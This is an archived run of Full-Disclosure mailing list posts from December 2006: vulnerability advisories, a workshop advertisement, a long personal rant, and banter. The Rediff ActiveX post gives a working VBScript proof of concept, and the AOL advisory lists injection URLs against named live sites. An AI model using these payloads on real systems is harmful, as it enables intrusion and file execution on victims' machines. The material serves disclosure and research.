    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_sparc.deb
      Size/MD5 checksum:  4360666 6d2643b993298bb133e306e37f68711f

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFk991Xm3vHE4uyloRAsuMAJ9RdIxPMGagWIJQsoTHzLgKbrC0KQCfZLXR
PiHrartJunIOaaEW01rB+0M=
=MYMl
-----END PGP SIGNATURE-----









From exceed at email.si  Fri Dec 29 00:34:51 2006
From: exceed at email.si (/dev/null)
Date: Thu, 28 Dec 2006 23:34:51 -0100
Subject: [Full-disclosure] msgina.dll BSOD
Message-ID: <20061229003453.2E3618B80E@www1.email.si>

Hi,

This if from MS forums:
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1043407&SiteID=1

Tested on Windows XP SP2 (EN) fully patched.

Here's the instant PoC:
http://users.volja.net/database/MSGINA.zip

Cheers,
/ex.

____________________
http://www.email.si/



From letmefocus at gmail.com  Fri Dec 29 04:21:23 2006
From: letmefocus at gmail.com (no me)
Date: Fri, 29 Dec 2006 09:51:23 +0530
Subject: [Full-disclosure] Information Security Behavior Management System
Message-ID: <5edf5b760612282021o22c3b83awa5230dbeb0872c32@mail.gmail.com>

Dear Sir/Madam,



First Legion Consulting is pleased to announce a 2-day Information Security
Workshop titled "*Information Security Behavior Management System * - *A Due
Diligence Information Security Workshop*"  on the 12th & 13th January at St.
Mark's Hotel, Bangalore, India.



This training program focuses on the "Human Factors such as Fraud, Error and
Incompetence" and how it affects Information Security. Further the ability
of Human Beings to analyze risks under pressure ( a factor used by Social
Engineers) is analyzed in depth.  The details brochure for the program is
available at http://www.firstlegion.net/isbms.pdf.



We hope you find the following points as valid for attending this program,



   - If you are an Information Security/ IT Managers, CISO's, ISO's,
   CTO's can understand how "Human Actions" cause undesirable Information
   Security behavior and how it impacts the "Organizational Behavior
   Eco-System".
   - If you are an Information Security Practitioners can learn and
   implement "Good Information Security Behavior Inventory".
   - If you are an ISO 9001/ISO 27001 Consultants can fine-tune your
   Information Security services with a "Human Focused" approach that adds
   value to your clients.
   - If you are a Student and Enthusiasts can learn an exciting new
   approach to Information Security.
   - If you are an HR Manager you can understand how work-force behavior
   affects organizational security goals and ultimately business objectives.





We have priced the workshop attractively with discounts for group
participation. We sincerely hope you shall attend with your colleagues and
make this program lively and meaningful. For comprehensive details please
call us at +91-484-6510536, +91-98479 30312



Please check http://www.firstlegion.net/isbms.pdf for more details.

Or mail to info at firstlegion.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061229/8f7a5470/attachment.html 

From 3APA3A at SECURITY.NNOV.RU  Fri Dec 29 10:22:59 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Fri, 29 Dec 2006 13:22:59 +0300
Subject: [Full-disclosure] msgina.dll BSOD
In-Reply-To: <20061229003453.2E3618B80E@www1.email.si>
References: <20061229003453.2E3618B80E@www1.email.si>
Message-ID: <93127832.20061229132259@SECURITY.NNOV.RU>

Dear /dev/null,

To manipulate GINA you need administrative privileges.

--Friday, December 29, 2006, 3:34:51 AM, you wrote to full-disclosure at lists.grok.org.uk:

dn> Hi,

dn> This if from MS forums:
dn> http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1043407&SiteID=1

dn> Tested on Windows XP SP2 (EN) fully patched.

dn> Here's the instant PoC:
dn> http://users.volja.net/database/MSGINA.zip

dn> Cheers,
dn> /ex.

dn> ____________________
dn> http://www.email.si/

dn> _______________________________________________
dn> Full-Disclosure - We believe in it.
dn> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
dn> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA
??????? ?? ?????? ???, ?? ????????? ????????????. ??????????? ??? ?. (????)



From juha-matti.laurio at netti.fi  Sat Dec 30 00:57:44 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Sat, 30 Dec 2006 02:57:44 +0200 (EET)
Subject: [Full-disclosure] Postcard.exe malware spammed with Happy New Year
	messages
Message-ID: <22577908.900291167440264615.JavaMail.juha-matti.laurio@netti.fi>

I have posted a summary type writing about this Happy New Year malware here:
http://blogs.securiteam.com/?p=775

The recent list of AV coverage included too.


- Juha-Matti



From mc at khamsa.net  Sat Dec 30 13:13:29 2006
From: mc at khamsa.net (Michele Cicciotti)
Date: Sat, 30 Dec 2006 14:13:29 +0100
Subject: [Full-disclosure] FW:  Vista RDP bug?
In-Reply-To: <20061226223410.BAE341D8F74@supertolla.itapac.net>
References: <20061226223410.BAE341D8F74@supertolla.itapac.net>
Message-ID: <20061230131339.758071D8F2D@supertolla.itapac.net>

> Beware of reports like this that make general statements. Obviously RDP
> isn't as buggy as he claims. I've used it lots of times with no such
> problems. He probably has a bad driver.

ATI probably. I know they give me _many_ headaches, many of which related to session-juggling



From ivan.chollet at lynanda.com  Sat Dec 30 12:31:53 2006
From: ivan.chollet at lynanda.com (ivan chollet)
Date: Sat, 30 Dec 2006 16:31:53 +0400
Subject: [Full-disclosure] hello
Message-ID: <200612301231.kBUCVoa4044904@ludwig.lynanda.com>

Hi everyone

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061230/98d5c397/attachment.html 

From codeshepherd at gmail.com  Sat Dec 30 12:41:42 2006
From: codeshepherd at gmail.com (Deepan)
Date: Sat, 30 Dec 2006 20:41:42 +0800
Subject: [Full-disclosure] WordPress Persistent XSS
In-Reply-To: 
References: 
Message-ID: <1167482502.28339.1.camel@codeworld>

On Wed, 2006-12-27 at 09:33 +0000, David Kierznowski wrote:
> Vulnerability Title: WordPress Persistent XSS
> Author: David Kierznowski
> Homepage: http://michaeldaw.org
> Software Vendor: WordPress Persistent XSS
> Versions affected: Confirmed in v2.0.5 (latest)
> 
> See homepage for more details.
> 
> WordPress was contacted: 26/12/06 22:04 BST
> Reply received: 27/12/06 06:11 BST
> WordPress has fixed this for v2.0.6, see
> http://trac.wordpress.org/changeset/4665


Dont you need admin privileges to access the templates.php url ? 
I am overseeing anything ? 



-- 
-----------------------------------------------
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/



From crewxsecurity at googlemail.com  Fri Dec 29 22:46:01 2006
From: crewxsecurity at googlemail.com (n3td3v)
Date: Fri, 29 Dec 2006 22:46:01 +0000
Subject: [Full-disclosure] n3td3v's year in brief: 2006
Message-ID: <5e261ec0612291446h2cda0dc4yac2223be5feb5d87@mail.gmail.com>

The year was pretty sober in terms of mass drama or global security
incidents, no router or mail server exploitation threatened
international infrastructure.

The year saw tension between microsoft and its patch tuesday policy
become less as strong as the security community kept pushing for
critical zero-day to be patched ahead of a pending Tuesday.

Zero-day code was put onto Full-Disclosure mailing list where we seen
an individual trying to do a live auction via e-mail

We saw word and powerpoint applications being exploited as hackers
look for unique zero-day to draw attention to previously unearthed
vulnerabilities.

2006 saw because of this the start of a new trend of Mac tiger OS
vulnerabilities to lever vulnerabilities onto mailing lists.

We saw a new move by microsoft to try and profit from its security
flaws, by protecting its vista kernal from security firms Symantec and
others

We saw laptop security, both socially and technically being brought
into the media arena where both the theft of a laptop or the
electronic hi-jacking of a device could allow a company to be
compromised and have its trade secrets revealed.

We seen a desperate approach to javascripting, where folks in the
security industry began to post ways to use JS in port scanning, via
web-based interfaces.

We saw a new trend started by H D Moore to blackmail software vendors,
microsoft to take security more seriously and to respond to their
e-mail more seriously.

The month of bugs trend now carries on with LMH threatening Apple by
an upcoming month of Apple bugs, a trend n3td3v has told LMH not to
proceed with.

2006 saw the second Myspace worm appear, with a conflict between Apple
and Myspace in its introduction of a patch for Apple's movie viewer
application.

2006 saw Securityfocus push its media agenda towards encouraging a
"social network" threat.

2006 saw Securityfocus report that n3td3v was a group of 3 people, two
guys and a girl... all false and unfounded. A mailing list post on the
Funsec mailing list was taken by "editor-at-large" robert lemos in his
increasing personal grudge against n3td3v to damage his reputation
further by reporting on the n3td3v agenda.


What robert lemos failed to report is that every single message sent
to the Full-Disclosure mailing list is approved by the list owner John
Cartwright.

Robert Lemos failed to report that, adding to the robert lemos agenda
to make n3td3v look like a malicious blackhat

Robert Lemos also got quotes from peopel within the industry to try
and suggest n3td3v is withholding Windows XP zero-day, to hint further
that n3td3v is blackhat and mailicious.

Robert Lemos in his report also tried to suggest n3td3v was hiding and
was a bad person.

The nature of the article was designed to try and lever the true
indent of n3td3v, even though n3td3v has broken no moral, ethical or
international law.

Due to the Robert Lemos grudge, Lemos carried the headline "Security
Troll" to suggest that n3td3v was posting untrue security information
to Full-Disclosure list to get a reaction.

Little is Lemos aware John Cartwright and n3td3v would communicate via
e-mail to discuss which content should be accepted to the mailing
list.

No where in the article does it mention anything about John Cartwright.

Little did Lemos report that the companies n3td3v helps have the full
name, photos and geographical location of n3td3v.

n3td3v is not anonymous, but for obvious personal saftey measures
which all internet users should take is never to post such contact
information to a public discussion on the internet.

Not only is this wise from a personal saftey angle, but is a good idea
in terms of indentity theft and stalker like activites and blackmail
attempts.

The article suggested it was wrong to post to a security mailing list
as an anonymous user and that it was morally and unethical to do so.

Little does Lemos know the underground connections and helpful
information is passed to high-profile security consultants within the
security industry and n3td3v's on-going commitments to pass on
intelligence tips on the bad guys in the blackhat community.

All the bad was talked of n3td3v, other than the true valued service
n3td3v and its intelligence sources offer to vendors... such as the
ones mentioned in the article as Google, Yahoo and Microsoft.

In 2006 we saw the slow down in mailing list postings of critical
zero-day and the increased posting of XSS (cross-site scripting).

In 2006, we saw the introduction of a splinter group called ZERT, who
released patches for critical flaws ahead of Microsoft's patch tuesday
policy.

In 2006, we saw further reporting of RFID as a real threat to consumer
privacy and its use by the intelligence services to spy on terrorist
suspects.

And of course in 2006 Steve Irwin died, the celebrity Crocodile
Hunter, which also got a mention on the Full-Dislcosure mailing list.

In 2006 we saw the media increasingly finding it difficult to bring
fresh news to technical users within the security community, so much
so both news.com and securityfocus.com started publishing "suggestive"
potential security incidents which could happen, instead of a balanced
out "risk assessment" of the reality of a threat.

We saw Symantec's Norton software get a bad feedback by average AV
users on news.com as being a "memory hog" application.

We saw microsoft's introduction of Microsoft OneCare at low pricing,
shaking up others such as Symantec

We saw security companies begin to roll out free security software
which anger further the profit margins of Symantec

We saw Google add credit's to its security site giving thanks to
noticed security researchers within the industry who have helped GOOG.

We saw the break-down of Yahoo's executive structure and admitted its
current business strategy and framework have failed with high-profile
employee shake-ups and firing.

In 2006, there was no real threat to security in terms of new methodology.

Generally, 2006 was slow, and has confirmed to hackers that the
industry is in need of new technique in the hacker-agenda and that
current advisories are just the "same old" attack vectors.

Hackers are now focusing on "brand new" than "same old" and 2007 is
sure to show security professionals that the old is out and the new is
in.

A pending public release of Vista won't bring up anything new in terms
of unique attack technique, but we're expecting the news of vista
kernal protection being cracked by security firms and the underground
elite to be released to media outlets in timing with the consumer
version of vista being made avaliable to the world market.

IE7 is not trusted yet by corporate networks as its default browser,
as testing is on-going, and with that it could be up till 2008 before
the software is fully implemented and trusted by e-commerce. Same goes
for Vista, hence the reason for business getting Vista become the
public, if only to give businesses a head-start for compatibility
testing.

2006 will see high-profile hacker Gary Mckinnon being sent to U.S on
charges of breaking into dot-mil infrasturcture. Media outlets suggest
he was a hacker, however the individual only used script kid-like
tactics to compromise systems with default passwords not changed by
U.S government network admins.

Digg-dot-com saw an increase presence in 2006 as a source of breaking
security news and invaluable average user feedback of news events in
relation to the comments section under Digg submissions, both useful
for e-commerce and government to shape its security policy and media
response agenda and network posture.

2006 saw the DHS (department of homeland security) attempt to become
increased with its cyber security alerts and advisory, although the
world already has made its mind -up in respect of the DHS and its
"incident response" lack of readiness in both the real world and
electronically.

2006 saw the intelligence services require further funding to continue
needed efforts to combat both cyber terrorism and mainland terrorism
threats.

2006 saw the continued use og blogging as a way to comunicate coverage
to the internet in terms of security research and media coverage
response.

2006 saw SANS for example continue to use its Internet Storm Blog as a
commentry media of whats posted to the Full-Disclosure mailing lsit,
as did SecuriTeam, with noted comment from Gadi Evron conitnued.

Funsec remained a favorite for some to post outage and misc media
reports to the media and professional scene,,, where the likes of
Lemos hangs out for "treat bites" to fuel his securityfocus news feed.

Overall, the trend of "money" or/and "career benefits" for zero-day
continues with hackers/researchers not wanting to give exploit code
for free. Generally, researchers want something in return, either
something to be done within a corporation in terms of security policy,
money given for exploit/vulnerability intelligence, a career
opportunity, or a promise of the affected vendor letting and crediting
the researcher to the media for Lemos or/and Evers to pick-up and
broadcast on its productivity news outlet homepage.

Script kiddie hood continues to be a real threat with the zone-h scene
still being exploited, with continued defacements of dot-mil and
dot-com targets falling victim.

The Yahoo Finance portal web just one victim of the zone-h scene, as
well as nasa sites were noted by n3td3v in 2006.

The priority of "what should we patch first" is an increased problem
behind the scenes within corporations, with money-over-moral playing a
key role in how long vulnerabilities are left live on software and
web-based services.

2007 is sure to bring suprises that none of us are able to predict
apart from folks like n3td3v who continue its dialog between security
consultants and its contacts working within corporate social circles.

Finally, the article on n3td3v won't be laid to rest... it has been
taken very seriously and n3td3v holds the article as a blantant abuse
of journalistic policy to bring a personal grudge by a news editor
towards an individual who only has whitehat values.

n3td3v will get justice for "that article" by lawful means, and holds
Robert Lemos personally responsible for any personal saftey or career
damage which may be caused by his media report to blantantly ruin
n3td3v's reputation and career prospects if the true indent was ever
to be revealed through the article published and authorised by the
securityfocus news editor.

2007 awaits...

n3td3v

[media dork reference]
http://news.com.com/5208-1002_3-0.html?forumID=1&threadID=23884&messageID=223146&start=-1



From vulnpost-remove at vuln.sg  Sat Dec 30 02:59:57 2006
From: vulnpost-remove at vuln.sg (TAN Chew Keong)
Date: Sat, 30 Dec 2006 10:59:57 +0800
Subject: [Full-disclosure] [vuln.sg] iso_wincmd Plugin for Total Commander
	Buffer Overflow Vulnerability
Message-ID: <4595D62D.2030109@vuln.sg>

[vuln.sg] Vulnerability Research Advisory

iso_wincmd Plugin for Total Commander Buffer Overflow Vulnerability

by Tan Chew Keong
Release Date: 2006-12-30

Summary
-------
A vulnerability has been found in iso_wincmd Total Commander Plugin.
When exploited, the vulnerability allows execution of arbitrary code
when the user opens a malicious ISO file.

Tested Versions
---------------
iso_wincmd version 1.7.3.3 (1.7.3 Beta 3) and version 1.6.10.

Details
-------
http://vuln.sg/isowincmd173-en.html
http://vuln.sg/isowincmd173-jp.html



From david.kierznowski at gmail.com  Sat Dec 30 17:32:36 2006
From: david.kierznowski at gmail.com (David Kierznowski)
Date: Sat, 30 Dec 2006 17:32:36 +0000
Subject: [Full-disclosure] WordPress template.php Exploit
Message-ID: 

Its been a few days since the release of:
http://michaeldaw.org/md-hacks/wordpress-persistent-xss/.
Other references:

    * http://www.securityfocus.com/bid/21782
    * http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6808

Time to release a proof of concept exploit for this. I am sure the
crackers will already be exploiting this in the wild.

If you remember from my original advisory, our attack was limited due
to our attack being passed through PHP's basename function. To get
around this we borrow the characters from document.location. I wanted
an exploit that was simple and compact.

If your interested the full article and code can be found here:
http://michaeldaw.org/md-hacks/wordpress-templatephp-exploit/



From david.kierznowski at gmail.com  Sat Dec 30 17:33:51 2006
From: david.kierznowski at gmail.com (David Kierznowski)
Date: Sat, 30 Dec 2006 17:33:51 +0000
Subject: [Full-disclosure] WordPress Persistent XSS
In-Reply-To: <1167482502.28339.1.camel@codeworld>
References: 
	<1167482502.28339.1.camel@codeworld>
Message-ID: 

Deepan,

Please see my most recent post:
http://michaeldaw.org/md-hacks/wordpress-templatephp-exploit/

David

On 30/12/06, Deepan  wrote:
> On Wed, 2006-12-27 at 09:33 +0000, David Kierznowski wrote:
> > Vulnerability Title: WordPress Persistent XSS
> > Author: David Kierznowski
> > Homepage: http://michaeldaw.org
> > Software Vendor: WordPress Persistent XSS
> > Versions affected: Confirmed in v2.0.5 (latest)
> >
> > See homepage for more details.
> >
> > WordPress was contacted: 26/12/06 22:04 BST
> > Reply received: 27/12/06 06:11 BST
> > WordPress has fixed this for v2.0.6, see
> > http://trac.wordpress.org/changeset/4665
>
>
> Dont you need admin privileges to access the templates.php url ?
> I am overseeing anything ?
>
>
>
> --
> -----------------------------------------------
> Regards
> Deepan Chakravarthy N
> http://www.codeshepherd.com/
> http://sudoku-solver.net/
>
>



From contact at metaeye.org  Sat Dec 30 14:59:29 2006
From: contact at metaeye.org (Metaeye SG)
Date: Sat, 30 Dec 2006 20:29:29 +0530
Subject: [Full-disclosure] Advisory: SQL Injection Vulnerability In Multiple
	AOL Websites.
Message-ID: <45967ED1.4090708@metaeye.org>

Vendor: AOL.

Severity: Critical.

Dated: 23 December 2006.

Explanation:
------------

SQL injection vulnerability has been noticed in number of AOL websites.
When a malformed input is injected in the URL parameter the relative
information regarding database , tables and various queries are
displayed on the web page.

An attacker can execute arbitrary SQL queries. Successful exploitation
can lead to full compromise of the database and the server.

Websites Affected:
------------------

AOL Ringtone: http://ringtones.aol.com/
Example: http://ringtones.aol.com/popArtist.php?_pgtyp=pdct&artistID='

AOL NHL DraftNET: http://nhldraftnet.aol.com/
Example: http://nhldraftnet.aol.com/NHLDraftNet/index.php?ID='

AOL Ability: http://ability.aol.com/
Example: http://ability.aol.com/ability/index.php?ID='


Vendor Status:
--------------

Reported.
No Response.
Not Patched.

Advisory URL: http://www.metaeye.org/advisories/31

--
MSG // http://www.metaeye.org



From juha-matti.laurio at netti.fi  Sun Dec 31 00:19:27 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Sun, 31 Dec 2006 02:19:27 +0200 (EET)
Subject: [Full-disclosure] Postcard.exe malware spammed with Happy New
 Year messages
Message-ID: <27054810.964991167524367816.JavaMail.juha-matti.laurio@netti.fi>

New variants are out and the AV coverage for these is remarkable poor.
The new variants use several different subject lines and attachments as Greeting Card.exe or Greeting Postcard.exe.

Some examples of the Subject lines:
Happy Times And Happy Memories!
Fun Filled New Year!
Welcome 2007!
etc.

- Juha-Matti



From collin at betaversion.net  Sun Dec 31 12:08:10 2006
From: collin at betaversion.net (Collin R. Mulliner)
Date: Sun, 31 Dec 2006 13:08:10 +0100
Subject: [Full-disclosure] PocketPC MMS - Remote Code
	Injection/Execution Vulnerability	and Denial-of-Service
In-Reply-To: <1155234498.18264.45.camel@panic>
References: <1155234498.18264.45.camel@panic>
Message-ID: <1167566890.7830.1.camel@panic>

The proof-of-concept exploit was released at the 23rd Chaos
Communication Congress in Berlin, Germany

get the PoC and all required tools at: http://www.mulliner.org/pocketpc/

Collin

On Thu, 2006-08-10 at 11:28 -0700, Collin R. Mulliner wrote:
> Vulnerability Report
> 
> -----------------------------
> 
> Vendor:       Microsoft and ArcSoft
> Product:      PocketPC OS and MMS Composer
> Version(s):   MMS Composer: 1.5.5.6, 2.0.0.13 (possible others)
> Platform:     PocketPC (tested on: WinCE 4.2 and WinCE 4.21, possible
>               others)
> Architecture: ARM
> 
> Device(s): HP iPAQ h6315, i-mate PDA2k (OEM: HTC BlueAngle) (possible 
>            others)
> 
> Application:        MMS User Agent (Inbox application)
> Application binary: tmail.exe
> 
> -----------------------------
> 
> Reporter(s): Collin Mulliner  (technical contact)
>              Prof. Giovanni Vigna 
> 
> Affiliation:  Reliable Software Group, University of California Santa
> Barbara
> 
> -----------------------------
> 
> Executive Summary:
>  Multiple buffer overflows in MMS parsing code, allow 
>  denial-of-service and REMOTE CODE INJECTION/EXECUTION via MMS.
> 
> -----------------------------
> 
> Disclosure Time Line:
>  July 12. 2006 : Vulnerability Report to ArcSoft and Microsoft
>  July 19. 2006 : Reply by ArcSoft and Microsoft
>  Aug. 02. 2006 : Vendor Provides Bug Fix to OEMs
>  Aug. 04. 2006 : Public Disclosure at DEFCON-14 
> 
> -----------------------------
> 
> BugFix:
>  BugFix is awaiting approval by OEMs
> 
> -----------------------------
> 
> Brief Technical Details:
> 
>  1.0) UDP port 2948 open on all interfaces
> 
>   Devices accept WAPPush via UDP port 2948 on the wireless LAN (Wi-Fi)
>   interface. This is unnecessary and can be used for Denial-of-Service 
>   attacks.
> 
>  -----------------------------
> 
>  2.0) Multiple buffer overflows in MMS message parser
> 
>   MMS Message parts:
> 
>    2.1) M-Notification.ind
>    2.2) M-Retrieve.conf (Header)
>    2.3) M-Retrieve.conf (Body)
>    2.4) SMIL parser (Message display function)
> 
>  -----------------------------
> 
>  2.1) Parser for M-Notification.ind
> 
>   Buffer overflows in handlers for the following header fields:
> 
>    1) TransactionID
>    2) Subject
>    3) ContentLocation
> 
>   Application crashes. Non-critical. Denial-of-Service attack possible. 
>   Exploitable via UDP port 2948.
> 	
>   Categorization: MEDIUM (denial-of-service via wireless LAN)
> 
>   Exploit: Proof-of-Concept available (DoS)
> 
>  -----------------------------
> 
>  2.2) Parser for M-Retrieve.conf (Header)
> 
>   Buffer overflows in handlers for the following header fields:
> 
>    1) Subject
>    2) Content-Type (can overwrite return address on stack)
>    3) start-info parameter of content-type
> 
>   Application crashes.
> 	
>   Categorization: LOW (exploitation requires control of MMS 
>                   infrastructure)
> 
>  -----------------------------
> 
>  2.3) Parser for M-Retrieve.conf (Body)
> 
>   Buffer overflows in handlers for the following body fields:
> 
>    Multi-Part Entry header:
>     1) Content-Type
>     2) Content-ID
>     3) ContentLocation
> 
>   In all cases it is possible to overwrite the return address.
> 	
>   Categorization: LOW (exploitation requires control of MMS 
>                   infrastructure)
> 
>  -----------------------------
> 
>  2.4) Parser for SMIL (Message display function) 
> 
>   Transported in: M-Retrieve.conf body content
> 
>   Buffer overflows in handlers for the following parameters:
> 
>     1) ID parameter of REGION tag
>       ID="CONTENT" CONTENT is copied into stack-based variable, CONTENT 
>       can be arbitrary long. 
> 
>     2) REGION parameter of TEXT tag
>       REGION="CONTENT" CONTENT is copied into stack-based variable, 
>       CONTENT can be arbitrary long.
> 
>   Both overflows allow one to overwrite the return address on the 
>   stack. Both are exploitable and we were able to create a 
>   proof-of-concept exploit. The exploit is triggered by viewing the 
>   malicious MMS message (this is different from other exploits that 
>   require substantial user interaction -- e.g., to install a program).
> 
>   Overflow happens after 300 bytes in version 1.5.5.6 and after 400 
>   bytes in version 2.0.0.13.
> 
>   Categorization: CRITICAL (REMOTE CODE EXECUTION)
> 
>   Exploit: Proof-of-Concept available (code execution)
> 	
> -----------------------------
>  
> Related DEFCON-14 slides and Proof-of-Concept DoS tool are available
> here:
> 
>  http://www.mulliner.org/pocketpc/
> 
> 
--
Collin R. Mulliner 
BETAVERSiON Systems [www.betaversion.net]
info/pgp: finger collin at betaversion.net
Forget object orientation!



From gregory_panakkal at fastmail.fm  Sun Dec 31 07:50:17 2006
From: gregory_panakkal at fastmail.fm (gregory_panakkal)
Date: Sun, 31 Dec 2006 13:20:17 +0530
Subject: [Full-disclosure] Rediff Bol Downloader ActiveX Allows Downloading
 and Spawning Arbitary Files
Message-ID: <1167551417.31766.282543145@webmail.messagingengine.com>

Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary
Files 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Affected Program : Rediff Bol Download ActiveX
ActiveX (OCX) Control that downloads the Rediff Bol Messenger
setup and spawns it.


Related URL : http://messenger.rediff.com/newbol/ 


Discovered by : Gregory R. Panakkal 


Vulnerability Description : 

Rediff Bol Downloader ActiveX control allows any webpage
to download and spawn file. These file can be of any type.
No filtering is done.

IE Displays an alert, if the code points to a executable file on the
internet. But execution of local files displays no alert.


Tested On :
* IE 7.0.5730.11 (WinXP SP2)
* IE 6.0.2900.2180 (WinXP SP2)


Proof Of Concept: 

[OBJECT id="rboldwn" WIDTH=445 HEIGHT=40
classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03"
codebase="http://imdownloads.rediff.com/newbol/Bol.CAB"]
[/OBJECT]

[script language="vbscript"]
 rboldwn.url = "file://C:/WINNT/Notepad.exe"
 rboldwn.fontsize = 14
 rboldwn.barcolor = EE4E00
 rboldwn.start = "start"
[/script]


A variation of this, allows downloading a HTML File that can
disclose the path to the local temporary internet files folder.
It can disclose the Logged in User's username. A typical path to
Temporary Internet Files folder is..
C:\Documents and Settings\\Local Settings\Temporary Internet
Files


Online Info + Demo: 
http://www.infogreg.com/security/misc/rediff-bol-downloader-allows-downloading-and-spawning-arbitary-files.html 


rgds, 
Gregory R. Panakkal 
http://www.infogreg.com/ 


-- 
  gregory_panakkal
  gregory_panakkal at fastmail.fm

-- 
http://www.fastmail.fm - Email service worth paying for. Try it for free



From dingo.ugly at gmail.com  Sun Dec 31 10:49:50 2006
From: dingo.ugly at gmail.com (Dingo Ugly)
Date: Sun, 31 Dec 2006 21:49:50 +1100
Subject: [Full-disclosure] Happy New Year to you all.
Message-ID: <3e234f2d0612310249ye14b8bcua1423b8ea1e0d4ff@mail.gmail.com>

except n3td3v.

;-p
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061231/c53c7d32/attachment.html 

From labs at ngsec.com  Sun Dec 31 16:12:49 2006
From: labs at ngsec.com (labs@NGSEC)
Date: Sun, 31 Dec 2006 17:12:49 +0100
Subject: [Full-disclosure] [NGSEC] ngGame #3 - BrainStorming
Message-ID: <4597E181.2020401@ngsec.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NGSEC is proud to announce its third security game:

   "NGSEC's Security Game #3 - BrainStorming"

About NGSEC Games:
- ------------------

NGSEC's games are a set of security challenges useful for anyone
interested in security or hacking. At the Games you'll be presented a set
of challenges you'll have to solve in order to gain access to each
following stage.

About Game #3:
- --------------

NGSEC's Security Game #3 - BrainStorming has 5 levels. Difficulty
grows every level, so first levels are very, very easy. On each level you
will be presented a form asking you to authenticate. You do not know
the user and the password, the goal is to bypass the authentication
mechanism.

  Please note you are NOT allowed to:
    - Hack the game-server.
    - Brute force the authentication mechanism.

By playing this game, you accept and agree these simple rules.

Start playing NGSEC's Games at:

    http://quiz.ngsec.com/

Please note ngGame #3 has the launch date in a few hours "01-Jan-2007" 00:01
Madrid's time.

- --
Next Generation Security S.L. - NGSEC
http://www.ngsec.com

C\O?Donnell n? 46, 3?B
28009 Madrid
Spain
Tel: +34 91 837 19 91
Fax: +34 91 577 84 45

Find NGSEC labs public key at: http://www.ngsec.com/pgp/labs.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFl+C1KrwoKcQl8Y4RAlUyAJ9jkExKJB4LZS7KdpQJPTm4ChfPLQCfb7NN
2cGHVqBEcaNZhyYf/tBDpWI=
=gKdp
-----END PGP SIGNATURE-----



From c-boost at hush.ai  Sun Dec 31 17:52:37 2006
From: c-boost at hush.ai (c-boost at hush.ai)
Date: Sun, 31 Dec 2006 12:52:37 -0500
Subject: [Full-disclosure] SACURE IS A REAL COMPANY!
Message-ID: <20061231175238.1954ADA84A@mailserver8.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Todd,
As the "CEO" of "Sacure Corporation" don't you have better things
to do than to respond to rants about your company? Even worse, you
indirectly admitted that the entire ordeal (lies and all) was true.
Do you make it a practice to hire executive level people who lie
out their assess to your customers?

And, what the fuck is up with your website? You have a FAKE
customer portal on it that is nothing more than a stupid JS that
pops up "Access Denied" and your "Live Help" does jack shit.  Why
would any real self respecting security company need to put a FAKE
customer portal up on their website AND fake live help? Seems like
your sales guy wasn't the only liar.







On 12/26/06 11:33 AM, "Todd Michael Cohan"  wrote:

> Response from CEO regarding 12.22.06 posting.
>
> Please note that as of September 29, 2006, Jeff Bernstein was no
longer
> employed by Sacure Corporation.  Any concerns or problems that
you may have
> had with Mr. Bernstein during his employment at Sacure, please
feel free to
> contact me directly to discuss.
>
> I sincerely apologize for any inconvenience.
>
> Todd Michael Cohan
> CEO
> www.sacure.com
> 732.469.1300 x. 11
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkWX+OUACgkQldqjutSA86o+SAP/RK/InyL879x6QJ11ZDCCpsTxNANd
Q1aFcyNsn6rF18R0Smp1tICou1VUlG3VnjY4lcPjMP7YLSx/gXtpbcTKOW4CkiuGnUBO
rucnlx7nKeTDhWJ7JpYRAqfhJ0v3beaYe/Day37OBveQFYe6KbJQTuYRmoPJJvqe1j/x
xnnyIi0=
=RORP
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



From sftsi at hushmail.com  Sun Dec 31 22:43:52 2006
From: sftsi at hushmail.com (sftsi at hushmail.com)
Date: Sun, 31 Dec 2006 23:43:52 +0100
Subject: [Full-disclosure] edbrowse buffer overflow
Message-ID: <20061231224352.75F95DA84A@mailserver8.hushmail.com>

 ____________________________________
< Sympathy for the Security Industry >
 ------------------------------------
        \   ^__^
         \  ($$)\_______
            (__)\       )\/\
                ||----w |
                ||     ||


http://sourceforge.net/tracker/index.php?func=detail&aid=1622117&gro
up_id=141946&atid=751061


      _______________________
     < HAPPY NEW YEAR!!!!!!! >
      -----------------------
             \   ^__^
              \  (OO)\_______
